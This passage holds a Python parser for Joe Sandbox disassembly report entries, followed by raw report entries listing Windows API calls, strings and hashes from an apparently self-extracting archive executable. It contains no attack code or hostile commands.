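# "Part of subcall function ADDR:"; argument list and comma are optional.
API_LINE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# "• String ID: a$b$c" (the report joins referenced strings with '$').
STRING_ID = re.compile(r"^\s*(?:•\s*)?String ID:\s*(?P<ids>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str                          # call-site address in the dump
    subcall_of: Optional[str] = None  # set when the call sits in a callee


@dataclass
class FunctionEntry:
    calls: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)

    def direct_imports(self) -> List[str]:
        """Module!Name pairs called from this function itself (subcalls excluded)."""
        return sorted({f"{c.module}!{c.name}" for c in self.calls if c.subcall_of is None})

    def dynamic_imports(self) -> List[str]:
        """Names resolved at run time: the second argument of each GetProcAddress call."""
        return [c.args[1] for c in self.calls
                if c.name == "GetProcAddress" and len(c.args) > 1]

    def dll_names(self) -> List[str]:
        """Every *.dll token seen in call arguments or in the referenced strings."""
        seen = {a for c in self.calls for a in c.args}
        seen.update(self.strings)
        return sorted((s for s in seen if s.lower().endswith(".dll")), key=str.lower)


def parse_entry(text: str) -> FunctionEntry:
    """Build a FunctionEntry from the text of one report entry; unknown lines are skipped."""
    entry = FunctionEntry()
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            entry.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
            continue
        m = STRING_ID.match(line)
        if m and m["ids"].strip():
            entry.strings = m["ids"].split("$")
    return entry


# Constructed input: lines copied from the report entry for 0015F353.
SAMPLE = """\
• GetModuleHandleW.KERNEL32 ref: 0015F36B
• GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0015F383
• GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0015F3A6
• GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0015F651
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0015F669
• CompareStringW.KERNEL32(00000400,00001001,001808A4,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 0015F762
• GetFileAttributesW.KERNELBASE(?,?,00180870,00000800,?,00000000,?,00000800), ref: 0015F78B
  • Part of subcall function 0015F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0015F324
  • Part of subcall function 0015F309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0015DEC8,Crypt32.dll,?,0015DF4A,?,0015DF2E,?,?,?,?), ref: 0015F346
• _swprintf.LIBCMT ref: 0015F834
• AllocConsole.KERNEL32 ref: 0015F888
• WriteConsoleW.KERNEL32(00000000), ref: 0015F8C6
• Sleep.KERNEL32(00002710), ref: 0015F8D1
• ExitProcess.KERNEL32 ref: 0015F8DF
• String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
"""

if __name__ == "__main__":
    e = parse_entry(SAMPLE)
    print("direct imports :", e.direct_imports())
    print("dynamic imports:", e.dynamic_imports())
    print("dll names      :", e.dll_names())
```

Separating directly imported, dynamically resolved and library-loaded names this way is what makes the routine's purpose readable at a glance: it hardens the DLL search path before anything else is loaded, checks for known side-loading DLL names next to the executable, and aborts with a console warning rather than doing anything with the files it finds. Feeding the whole entry (hashes, memory dump lines and all) to parse_entry is safe, because only lines in the two recognised shapes are consumed.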

                                                                                    Control-flow Graph
                                                                                    • Basic blocks 16aa45-16b652; the rendered graph (with its executed / not-executed colouring) is not preserved in this extraction.
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 0016AA4A
                                                                                      • Part of subcall function 001696EC: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 001697B4
                                                                                    • SetFileAttributesW.KERNEL32(?,00000005,?,?,?,00000800,?,?,00000000,00000001,0016A35D,?,00000000), ref: 0016AB7F
                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 0016AC39
                                                                                    • DeleteFileW.KERNEL32(?), ref: 0016AC47
                                                                                    • SetWindowTextW.USER32(?,?), ref: 0016AD90
                                                                                    • _wcsrchr.LIBVCRUNTIME ref: 0016AF1A
                                                                                    • GetDlgItem.USER32(?,00000066), ref: 0016AF55
                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0016AF65
                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,0019412A), ref: 0016AF79
                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0016AFA2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$AttributesMessageSendTextWindow$DeleteEnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                    • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                    • API String ID: 3676479488-312220925
                                                                                    • Opcode ID: 29213f42ff8cae7fda19cb4d18ce1995913640125cd8ca5829160aa6907231f4
                                                                                    • Instruction ID: ab385f966ec49c62b3ae7a0b5135f90f7df144b6c205793638a38269cf1c69fd
                                                                                    • Opcode Fuzzy Hash: 29213f42ff8cae7fda19cb4d18ce1995913640125cd8ca5829160aa6907231f4
                                                                                    • Instruction Fuzzy Hash: EFE17E72900229AAEF24EBA4DD85DEE73BCAF15350F5040A6F919F7041EB709B94CF61

                                                                                    Control-flow Graph
                                                                                    • Basic blocks 15ced7-15d13f; the rendered graph (with its executed / not-executed colouring) is not preserved in this extraction.
                                                                                    APIs
                                                                                      • Part of subcall function 0015C88E: _wcschr.LIBVCRUNTIME ref: 0015C8BD
                                                                                    • GetWindowRect.USER32(?,?), ref: 0015CF0E
                                                                                    • GetClientRect.USER32(?,?), ref: 0015CF1A
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0015CFBB
                                                                                    • GetWindowRect.USER32(?,?), ref: 0015CFE8
                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0015D007
                                                                                    • SetWindowTextW.USER32(?,?), ref: 0015D02E
                                                                                    • GetSystemMetrics.USER32(00000008), ref: 0015D036
                                                                                    • GetWindow.USER32(?,00000005), ref: 0015D041
                                                                                    • GetWindowTextW.USER32(00000000,?,00000400), ref: 0015D06C
                                                                                    • SetWindowTextW.USER32(00000000,00000000), ref: 0015D099
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0015D0AC
                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0015D11E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$RectText$ClientLongMetricsSystem_wcschr
                                                                                    • String ID: d
                                                                                    • API String ID: 4134264131-2564639436
                                                                                    • Opcode ID: 850a4796fdee60918246fd9ff7fe5f2bc0d4305cffea3ded1b4d106b085acc6d
                                                                                    • Instruction ID: 6dad087e630a3fc557c5e716ac5be7eba53423262143385519112acbd8e1a6d4
                                                                                    • Opcode Fuzzy Hash: 850a4796fdee60918246fd9ff7fe5f2bc0d4305cffea3ded1b4d106b085acc6d
                                                                                    • Instruction Fuzzy Hash: 35617E71108300AFD310DF68CD88E6BBBEAEFC9715F44451EFA9496290C774E9498B52

Control-flow Graph

APIs
• GetDlgItem.USER32(00000068,001A8958), ref: 0016B71D
• ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,00169325), ref: 0016B748
• SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0016B757
• SendMessageW.USER32(00000000,000000C2,00000000,001802E4), ref: 0016B761
• SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0016B777
• SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0016B78D
• SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0016B7CD
• SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0016B7D7
• SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0016B7E6
• SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0016B809
• SendMessageW.USER32(00000000,000000C2,00000000,00181368), ref: 0016B814
Strings
Memory Dump Source
• Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
• Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_150000_file.jbxd
Similarity
• API ID: MessageSend$ItemShowWindow
• String ID: \
• API String ID: 1207805008-2967466578
• Opcode ID: 51cc3e2ed84eb38fd51c2e4076d503d8eb7b16333639ba898f225ec280b8ddf1
• Instruction ID: a4c100dd3bc4221f2ead2789f2d90ed4413f359f087cc5989b25f990adbf5e4c
• Opcode Fuzzy Hash: 51cc3e2ed84eb38fd51c2e4076d503d8eb7b16333639ba898f225ec280b8ddf1
• Instruction Fuzzy Hash: 232135712897447BE311EB249C81FAF7EDCEF82714F000A19FA90E61D1D7A54A488BA7

Control-flow Graph

APIs
• ShellExecuteExW.SHELL32(000001C0), ref: 0016BAD8
• ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?), ref: 0016BB1D
• GetExitCodeProcess.KERNEL32(?,?), ref: 0016BB55
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0016BB7B
• ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 0016BC0A
  • Part of subcall function 00160B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0015AC49,?,?,?,0015ABF8,?,-00000002,?,00000000,?), ref: 00160B28
Strings
Memory Dump Source
• Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
• Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_150000_file.jbxd
Similarity
• API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
• String ID: $.exe$.inf
• API String ID: 3686203788-2452507128
• Opcode ID: 35d97a96c80edbd3f1331377b7307a13cd6f57aaae27fc9dd41c3ba54d3c935a
• Instruction ID: 0d1d4fefc3807e43baa347c5484b9628c216c6e5db201af8e34df86913521d1e
• Opcode Fuzzy Hash: 35d97a96c80edbd3f1331377b7307a13cd6f57aaae27fc9dd41c3ba54d3c935a
• Instruction Fuzzy Hash: F051AF7150D3809AD731AF64DD806BBB7E9AF85704F04081DE8C1D7165EBB29AE8CB62

Control-flow Graph

APIs
• __EH_prolog.LIBCMT ref: 0015CAD1
• _wcschr.LIBVCRUNTIME ref: 0015CAEF
• GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0015CAB3,?), ref: 0015CB0A
  • Part of subcall function 001606E9: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0015B25B,00000000,?,?,?,?), ref: 00160705
Strings
Memory Dump Source
• Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
• Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_150000_file.jbxd
Similarity
• API ID: ByteCharFileH_prologModuleMultiNameWide_wcschr
• String ID: *messages***$*messages***$R$a
• API String ID: 803915177-2900423073
• Opcode ID: f1e967f278d084617f141985775de125752341819f2b6d6fc51ffaa0c1257d5b
• Instruction ID: 2f1caa7313eb87cc0006574ba6637e5cea48c8da935aae6e8acc7a31613c8619
• Opcode Fuzzy Hash: f1e967f278d084617f141985775de125752341819f2b6d6fc51ffaa0c1257d5b
• Instruction Fuzzy Hash: 799105B1900304DEDB24DFA8CC45BEEBBB4EF54701F10456AEA69EB291D7709989CBD0

Control-flow Graph

APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00172FC2,00172FC2,?,?,?,001775FF,00000001,00000001,F5E85006), ref: 00177408
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,001775FF,00000001,00000001,F5E85006,?,?,?), ref: 0017748E
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00177588
• __freea.LIBCMT ref: 00177595
  • Part of subcall function 001759FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,001723AA,?,0000015D,?,?,?,?,00172F29,000000FF,00000000,?,?), ref: 00175A2E
• __freea.LIBCMT ref: 0017759E
• __freea.LIBCMT ref: 001775C3
Memory Dump Source
• Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
• Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_150000_file.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
• API String ID: 1414292761-0
• Opcode ID: 889cbd0d842565434816cb1a18d7f91747d39297a741d27dc373c3dc39a34942
• Instruction ID: cbb9d2c6ba802d3361a37bdb03ce7f48b8f61088eb5d89b21507023874a4cdc2
• Opcode Fuzzy Hash: 889cbd0d842565434816cb1a18d7f91747d39297a741d27dc373c3dc39a34942
• Instruction Fuzzy Hash: F451C172604216ABEB258F64CC85EBF77BAEB45750F158629FC09D6180EB34DD50CAA0

Control-flow Graph

APIs
  • Part of subcall function 0015F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0015F324
  • Part of subcall function 0015F309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0015DEC8,Crypt32.dll,?,0015DF4A,?,0015DF2E,?,?,?,?), ref: 0015F346
• OleInitialize.OLE32(00000000), ref: 0016904F
• GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00169086
• SHGetMalloc.SHELL32(001920E8), ref: 00169090
Strings
Memory Dump Source
• Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
• Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_150000_file.jbxd
Similarity
• API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
• String ID: riched20.dll$3Ro
• API String ID: 3498096277-3613677438
• Opcode ID: 878540be8b262f981c2a0c498f01f6d136538a85c0adc0fc2173397fb3495990
• Instruction ID: 14f5ce7b3fab78944bd27d95ef998c34802ebdfb00972676ecff181d47bc271a
• Opcode Fuzzy Hash: 878540be8b262f981c2a0c498f01f6d136538a85c0adc0fc2173397fb3495990
• Instruction Fuzzy Hash: D5F03CB1800109ABDB10AF9AD8499EEFBBCEF94701F00405BE814A2600D7B45645CBA1

Control-flow Graph

APIs
  • Part of subcall function 0015FDC9: ResetEvent.KERNEL32(?,?,0015F9F3,00AB2CE0,?,00191E74,00000000,0017F79B,000000FF,000001B8,0015FC8F,?,?,?,?,0015A5A0), ref: 0015FDE9
  • Part of subcall function 0015FDC9: ReleaseSemaphore.KERNEL32(?,?,00000000,?,?,?,?,0015A5A0,?,?,?,?,0017F79B,000000FF), ref: 0015FDFD
• ReleaseSemaphore.KERNEL32(?,00000020,00000000), ref: 0015FA05
• CloseHandle.KERNEL32(?,?), ref: 0015FA1F
• DeleteCriticalSection.KERNEL32(?), ref: 0015FA38
• CloseHandle.KERNELBASE(?), ref: 0015FA44
• CloseHandle.KERNEL32(?), ref: 0015FA50
  • Part of subcall function 0015FAC7: WaitForSingleObject.KERNEL32(?,000000FF,0015FD0B,?,?,0015FD80,?,?,?,?,?,0015FD6A), ref: 0015FACD
  • Part of subcall function 0015FAC7: GetLastError.KERNEL32(?,?,0015FD80,?,?,?,?,?,0015FD6A), ref: 0015FAD9
Memory Dump Source
• Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
• Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_150000_file.jbxd
Similarity
• API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
• String ID:
• API String ID: 1868215902-0
• Opcode ID: b384db0d30943a1812e79cd92f7838e06defb2e5a39124316e4dd45bc85bac62
• Instruction ID: ab4186040e7e4942de9757ba936a02aaa075a4db3a0af3453de610cae3bae07a
• Opcode Fuzzy Hash: b384db0d30943a1812e79cd92f7838e06defb2e5a39124316e4dd45bc85bac62
• Instruction Fuzzy Hash: F201B532000B48EFC7329B68DD44F8ABBFAFB49751F00452DF66E96560CB712849CB21

Control-flow Graph

                                                                                    APIs
                                                                                    • GetClassNameW.USER32(?,?,00000050), ref: 00168FDF
                                                                                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 00169016
                                                                                      • Part of subcall function 00160B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0015AC49,?,?,?,0015ABF8,?,-00000002,?,00000000,?), ref: 00160B28
                                                                                    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00169006
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                    • String ID: EDIT
                                                                                    • API String ID: 4243998846-3080729518
                                                                                    • Opcode ID: e57f5b34171f95ae58ed33aee49130e6fb2b5f3073c60085f392c9753b4087b5
                                                                                    • Instruction ID: 71b6339ad26ee134d5c5d04462b5c8e5a5798f155b68d2c49a5b199fc3b91430
                                                                                    • Opcode Fuzzy Hash: e57f5b34171f95ae58ed33aee49130e6fb2b5f3073c60085f392c9753b4087b5
                                                                                    • Instruction Fuzzy Hash: 3DF08232A0132877EB306A659D05FAB76ACAF4AB11F440066BE00F3981D7609E52C7E6

                                                                                    Control-flow Graph
                                                                                    control_flow_graph 905 16be0a-16be35 call 16cec0 SetEnvironmentVariableW call 15ef07 909 16be3a-16be3e 905->909 910 16be62-16be66 909->910 911 16be40-16be44 909->911 912 16be4d-16be54 call 15effe 911->912 915 16be46-16be4c 912->915 916 16be56-16be5c SetEnvironmentVariableW 912->916 915->912 916->910
                                                                                    APIs
                                                                                    • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0016BE20
                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0016BE5C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnvironmentVariable
                                                                                    • String ID: sfxcmd$sfxpar
                                                                                    • API String ID: 1431749950-3493335439
                                                                                    • Opcode ID: a329ec0fb534236f9b6374b8ed1122747688fac353874e6b05f8c08a821c7262
                                                                                    • Instruction ID: 25759cc0af134dd5c99a6a3396ad42c6585945e7a11faa88344b40184d2cf254
                                                                                    • Opcode Fuzzy Hash: a329ec0fb534236f9b6374b8ed1122747688fac353874e6b05f8c08a821c7262
                                                                                    • Instruction Fuzzy Hash: 1EF0A072805238FAC7252FD08C4DAF67B9CAF18B52B040052FD989A141EB668ED0CBE0

                                                                                    Control-flow Graph
                                                                                    control_flow_graph 917 15973d-15975e call 16cec0 920 159767 917->920 921 159760-159765 917->921 922 159769-159786 920->922 921->920 921->922 923 15978e-159798 922->923 924 159788 922->924 925 15979d-1597c8 CreateFileW 923->925 926 15979a 923->926 924->923 927 15982c-159841 925->927 928 1597ca-1597ec GetLastError call 15b275 925->928 926->925 929 159843-159856 call 15f10e 927->929 930 15985b-159866 927->930 934 1597ee-159810 CreateFileW GetLastError 928->934 935 15981b-159820 928->935 929->930 937 159816-159819 934->937 938 159812 934->938 935->927 936 159822 935->936 936->927 937->927 937->935 938->937
                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,-00000001,00000000,?,00000000,?,?,0015777A,?,00000005,?,00000011), ref: 001597BD
                                                                                    • GetLastError.KERNEL32(?,?,0015777A,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001597CA
                                                                                    • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,0015777A,?,00000005,?), ref: 001597FF
                                                                                    • GetLastError.KERNEL32(?,?,0015777A,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00159807
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateErrorFileLast
                                                                                    • String ID:
                                                                                    • API String ID: 1214770103-0
                                                                                    • Opcode ID: cc8acbc172c67791dc3b5d1efe57f5d7e204dc018374758e0bb425b2b919bf06
                                                                                    • Instruction ID: 4d3f12c460e9d28f474d39089a5bf781da6aea73f062965781a1b656d0241761
                                                                                    • Opcode Fuzzy Hash: cc8acbc172c67791dc3b5d1efe57f5d7e204dc018374758e0bb425b2b919bf06
                                                                                    • Instruction Fuzzy Hash: 4E315470840349EFE7209F248C45BE6BBA8FB49360F104629FDA08B2D1D375998CCBD1
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00159623
                                                                                    • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 0015963B
                                                                                    • GetLastError.KERNEL32 ref: 0015966D
                                                                                    • GetLastError.KERNEL32 ref: 0015968C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$FileHandleRead
                                                                                    • String ID:
                                                                                    • API String ID: 2244327787-0
                                                                                    • Opcode ID: a784fa8a2c1bd40ad1189e58faebc62c951cfcbb1f349681a73f1a3699068dc8
                                                                                    • Instruction ID: 7fde3f92a457e20a0510d67db2bc2443b685a357ca94a9c0c74329b7cdd8ec52
                                                                                    • Opcode Fuzzy Hash: a784fa8a2c1bd40ad1189e58faebc62c951cfcbb1f349681a73f1a3699068dc8
                                                                                    • Instruction Fuzzy Hash: C0117C74500208EFCF249F61C804AAA77ADEB19362F10852AFD7A8D290D7798D8CDF53
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00172213,00000000,00000000,?,00177778,00172213,00000000,00000000,00000000,?,00177975,00000006,FlsSetValue), ref: 00177803
